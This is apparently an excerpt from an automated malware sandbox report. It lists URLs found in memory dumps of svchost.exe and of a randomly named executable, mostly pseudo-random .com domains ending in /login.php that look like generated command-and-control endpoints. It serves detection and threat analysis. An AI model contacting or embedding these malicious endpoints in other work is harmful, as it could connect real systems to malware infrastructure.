00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygug.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361214474.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylul.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pufymoq.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2809409371.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2814428917.00000000040FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyweq.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxug.com/login.php
Source: svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418889094.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3278908147.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3406954551.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxyp.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybig.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3407860513.0000000000826000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycil.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.phpB
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyduv.com/login.php
Source: svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygaq.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypup.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyteq.com/http://ganyvoz.com/
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujytug.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumybuq.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumycug.com/
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjev.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyjip.com/login.php
Source: svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/http://pumymap.com/http://qexyfuq.com/
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymap.com/login.php
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymuv.com/
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumymuv.com/login.php
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347450056.000000000338B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywug.com/
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywug.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumyxep.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2649196751.00000000091F7000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D72000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pumyxiv.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyboq.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycop.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupycuv.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375772840.0000000003361000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381004146.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376920856.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydev.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupygel.com/
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyjuv.com/http://vonybat.com/
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylaq.com/
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylaq.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylug.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypep.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupywyv.com/login.php
